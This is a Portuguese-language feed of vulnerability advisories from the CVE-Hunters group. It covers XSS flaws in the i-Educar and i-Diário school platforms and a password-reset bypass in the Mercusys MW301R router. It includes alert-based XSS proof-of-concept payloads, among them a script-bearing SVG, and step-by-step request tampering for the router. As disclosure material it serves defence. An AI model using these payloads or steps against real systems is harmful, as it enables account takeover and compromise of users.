id="cve-2025-7868-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_dia_motivo_cadphp-parâmetro-cod_calendario_dia_motivo">CVE-2025-7868: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_calendario_dia_motivo_cad.php</code> parâmetro <code>cod_calendario_dia_motivo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-78668" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-78668</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_calendario_dia_motivo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cod_calendario_dia_motivo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_calendario_dia_motivo_cad.php</code></p><h2 id="cve-2025-7868-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_dia_motivo_cadphp-parâmetro-cod_calendario_dia_motivo">CVE-2025-7868: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_calendario_dia_motivo_cad.php</code> parâmetro <code>cod_calendario_dia_motivo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-78668" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-78668</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_calendario_dia_motivo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cod_calendario_dia_motivo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_calendario_dia_motivo_cad.php</code></p> <p>Parâmetro: <code>cod_calendario_dia_motivo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cod_calendario_dia_motivo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar PaCXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7868/image-1.png" width="1895" height="984" srcset="/p/cve-2025-7868/image-1_hu_97d38405728c544.png 480w, /p/cve-2025-7868/image-1_hu_3a6a150e1d9596b7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-7868/image.png" width="1908" height="969" srcset="/p/cve-2025-7868/image_hu_a173bc0dd1ee021a.png 480w, /p/cve-2025-7868/image_hu_61aa51eb4a1fba4a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="196" data-flex-basis="472px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/RtXMxNLuAx8" target="_blank" rel="noopener" >https://youtu.be/RtXMxNLuAx8</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7869/ https://www.cvehunters.com/pt/p/cve-2025-7869/ <h2 id="cve-2025-7869-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_detphp-parâmetro-cod_turma_tipo">CVE-2025-7869: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_turma_tipo_det.php</code> parâmetro <code>cod_turma_tipo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7869" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7869</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_turma_tipo_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cod_turma_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_turma_tipo_det.php</code></p><h2 id="cve-2025-7869-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_detphp-parâmetro-cod_turma_tipo">CVE-2025-7869: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_turma_tipo_det.php</code> parâmetro <code>cod_turma_tipo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7869" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7869</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_turma_tipo_det.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cod_turma_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_turma_tipo_det.php</code></p> <p>Parâmetro: <code>cod_turma_tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cod_turma_tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar PaCXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7869/image.png" width="1869" height="982" srcset="/p/cve-2025-7869/image_hu_a2589e8ed4337362.png 480w, /p/cve-2025-7869/image_hu_17deafef38d887a2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <p><img src="/p/cve-2025-7869/image-1.png" width="1908" height="961" srcset="/p/cve-2025-7869/image-1_hu_fab2a14a1c166956.png 480w, /p/cve-2025-7869/image-1_hu_8f2641744613856f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="198" data-flex-basis="476px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/RtXMxNLuAx8" target="_blank" rel="noopener" >https://youtu.be/RtXMxNLuAx8</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7870/ https://www.cvehunters.com/pt/p/cve-2025-7870/ <h2 id="cve-2025-7870-cross-site-scripting-xss-armazenado-via-upload-de-svg">CVE-2025-7870: Cross-Site Scripting (XSS) Armazenado via Upload de SVG </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7870" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7870</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um invasor pode carregadr um arquivo SVG malicioso contendo JavaScript incorporado que é executado quando o arquivo é acessado diretamente. Isso resulta em Cross-Site Scripting Armazenado (XSS).</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O endpoint <code>justificativas-de-falta</code> permite que os usuários carreguem arquivos após carregarem um SVG criado. O XSS pode ser acionado ao abrir o arquivo.</p> <h2 id="payload">Payload: </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">"http://www.w3.org/2000/svg"</span> <span class="na">fill</span><span class="o">=</span><span class="s">"none"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">"This is an XSS-POC from CVEHUNTERS"</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p style="text-align: justify;">Crie o arquivo com o payload e carregue-o no endpoint <code>justificativas-de-falta</code>:</p><h2 id="cve-2025-7870-cross-site-scripting-xss-armazenado-via-upload-de-svg">CVE-2025-7870: Cross-Site Scripting (XSS) Armazenado via Upload de SVG </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7870" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7870</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um invasor pode carregadr um arquivo SVG malicioso contendo JavaScript incorporado que é executado quando o arquivo é acessado diretamente. Isso resulta em Cross-Site Scripting Armazenado (XSS).</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O endpoint <code>justificativas-de-falta</code> permite que os usuários carreguem arquivos após carregarem um SVG criado. O XSS pode ser acionado ao abrir o arquivo.</p> <h2 id="payload">Payload: </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">"http://www.w3.org/2000/svg"</span> <span class="na">fill</span><span class="o">=</span><span class="s">"none"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">"This is an XSS-POC from CVEHUNTERS"</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p style="text-align: justify;">Crie o arquivo com o payload e carregue-o no endpoint <code>justificativas-de-falta</code>:</p> <p><img src="/p/cve-2025-7870/image.png" width="1015" height="489" srcset="/p/cve-2025-7870/image_hu_97f480d64265cd01.png 480w, /p/cve-2025-7870/image_hu_716aaa27c91d8c32.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="207" data-flex-basis="498px" /></p> <p style="text-align: justify;">Depois disso, abra o arquivo para acionar o XSS</p> <p><img src="/p/cve-2025-7870/image-1.png" width="1014" height="554" srcset="/p/cve-2025-7870/image-1_hu_f8cd9eca2b7a1c6.png 480w, /p/cve-2025-7870/image-1_hu_8545ee9302fe0aef.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="183" data-flex-basis="439px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7871/ https://www.cvehunters.com/pt/p/cve-2025-7871/ <h2 id="cve-2025-7871-cross-site-scripting-xss-refletido-no-endpoint-conteudos-parâmetro-filterby_description">CVE-2025-7871: Cross-Site Scripting (XSS) Refletido no endpoint <code>conteudos</code> parâmetro <code>filter[by_description]</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7871" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7871</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>conteudos</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>filter[by_description]</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>conteudos</code></p> <p>Parâmetro: <code>filter[by_description]</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>filter[by_description]</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-7871-cross-site-scripting-xss-refletido-no-endpoint-conteudos-parâmetro-filterby_description">CVE-2025-7871: Cross-Site Scripting (XSS) Refletido no endpoint <code>conteudos</code> parâmetro <code>filter[by_description]</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7871" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7871</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>conteudos</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>filter[by_description]</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>conteudos</code></p> <p>Parâmetro: <code>filter[by_description]</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>filter[by_description]</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7871/image.png" width="1068" height="456" srcset="/p/cve-2025-7871/image_hu_2d1d25c318923651.png 480w, /p/cve-2025-7871/image_hu_b7c29b14bea54e56.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="562px" /></p> <p><img src="/p/cve-2025-7871/image-1.png" width="1782" height="1042" srcset="/p/cve-2025-7871/image-1_hu_4b4784dcf11d21e5.png 480w, /p/cve-2025-7871/image-1_hu_d1ea07eeaf8e7cc2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="171" data-flex-basis="410px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7881/ https://www.cvehunters.com/pt/p/cve-2025-7881/ <h2 id="cve-2025-7881-bypass-de-autenticação-na-redefinição-de-senha">CVE-2025-7881: Bypass de Autenticação na Redefinição de Senha </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7881" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7881</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Em sessões autenticadas, é possível ignorar completamente o fluxo de trabalho de alteração de senha sem saber a senha atual do administrador. No Mercusys MW301R, o método oficial de recuperação de uma senha esquecida é realizar uma redefinição de fábrica — o que requer acesso físico — ou, em uma sessão válida, fornecer a senha existente. O bypass descoberto permite que um invasor já autenticado intercepte a solicitação HTTP e simplesmente modifique o parâmetro de código para invocar o endpoint de redefinição diretamente. Isso permite que a senha do administrador seja alterada remotamente, sem qualquer interação física com o dispositivo ou conhecimento da credencial anterior.</p><h2 id="cve-2025-7881-bypass-de-autenticação-na-redefinição-de-senha">CVE-2025-7881: Bypass de Autenticação na Redefinição de Senha </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7881" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7881</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Em sessões autenticadas, é possível ignorar completamente o fluxo de trabalho de alteração de senha sem saber a senha atual do administrador. No Mercusys MW301R, o método oficial de recuperação de uma senha esquecida é realizar uma redefinição de fábrica — o que requer acesso físico — ou, em uma sessão válida, fornecer a senha existente. O bypass descoberto permite que um invasor já autenticado intercepte a solicitação HTTP e simplesmente modifique o parâmetro de código para invocar o endpoint de redefinição diretamente. Isso permite que a senha do administrador seja alterada remotamente, sem qualquer interação física com o dispositivo ou conhecimento da credencial anterior.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"> <ol> <li> Acesse a interface web do roteador navegando até <code>http://192.168.1.1/</code> e efetue login com a senha de administrador. <br /><strong>Observação:</strong> Se a senha for esquecida, o único método de recuperação é uma redefinição de fábrica usando o botão físico Reset (mantenha-o pressionado até que todos os LEDs acendam). </li> <li> Enquanto estiver conectado, execute qualquer ação que acione uma solicitação POST com os parâmetros <code>code=</code> e <code>id=</code> (por exemplo, keepalive ou verificação de status) e intercepte-a usando um proxy para capturar um ID de sessão válido. </li> <li> Modifique a solicitação interceptada alterando <code>code=</code> para <code>code=5</code> e, em seguida, encaminhe a solicitação alterada para o roteador. </li> <li> Atualize a página em <code>http://192.168.1.1/</code> no seu navegador. </li> <li> A interface agora solicitará uma nova senha sem solicitar a atual. Defina e confirme sua nova senha para redefini-la remotamente. </li> </ol> </p> <h2 id="poc">PoC </h2><p><img src="/p/cve-2025-7881/image.png" width="1761" height="914" srcset="/p/cve-2025-7881/image_hu_84851d9b3281fdd2.png 480w, /p/cve-2025-7881/image_hu_712ec8092b9c202e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-7881/image-1.png" width="1896" height="950" srcset="/p/cve-2025-7881/image-1_hu_ffbdf451785a2336.png 480w, /p/cve-2025-7881/image-1_hu_b3e5565b00c0449f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="199" data-flex-basis="478px" /></p> <p><img src="/p/cve-2025-7881/image-2.png" width="1743" height="990" srcset="/p/cve-2025-7881/image-2_hu_b00c8f44d15ccd57.png 480w, /p/cve-2025-7881/image-2_hu_9492fbe60421903a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="176" data-flex-basis="422px" /></p> <p><img src="/p/cve-2025-7881/image-3.png" width="1897" height="948" srcset="/p/cve-2025-7881/image-3_hu_582f72308fd6f70c.png 480w, /p/cve-2025-7881/image-3_hu_bf92a9c54baec3b4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="480px" /></p> <h3 id="video-poc">Video PoC </h3><p><a class="link" href="https://youtu.be/-mlmTZ-3PzM" target="_blank" rel="noopener" >https://youtu.be/-mlmTZ-3PzM</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">A falta de validação de sessão neste endpoint pode levar a vários riscos de segurança:</p> <p style="text-align: justify;"> <ul> <li><b>Exposição de Dados Não Autorizada:</b> Usuários não autenticados podem enumerar ou recuperar dados internos confidenciais.</li> <li><b>Escalonamento de Privilégios:</b> Invasores podem acessar ou inferir informações destinadas apenas a usuários autorizados.</li> <li><b>Divulgação de Informações:</b> Lógica de negócios e IDs internos (como funções ou permissões de usuário) podem ser vazados.</li> <li><b>Suporte de Reconhecimento:</b> Facilita o mapeamento de estruturas de backend para ataques mais direcionados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7882/ https://www.cvehunters.com/pt/p/cve-2025-7882/ <h2 id="cve-2025-7882-bypass-de-força-bruta-via-ciclagem-de-ip">CVE-2025-7882: Bypass de Força Bruta via Ciclagem de IP </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7882" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7882</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O roteador Mercusys MW301R implementa um mecanismo básico de proteção contra força bruta que bloqueia tentativas de login após um certo número de tentativas de login. Tentativas com falha. No entanto, esse mecanismo de bloqueio se baseia exclusivamente no endereço IP de origem, sem impor nenhuma impressão digital de sessão, validação de token ou limitação avançada de taxa e endereço MAC, etc.</p><h2 id="cve-2025-7882-bypass-de-força-bruta-via-ciclagem-de-ip">CVE-2025-7882: Bypass de Força Bruta via Ciclagem de IP 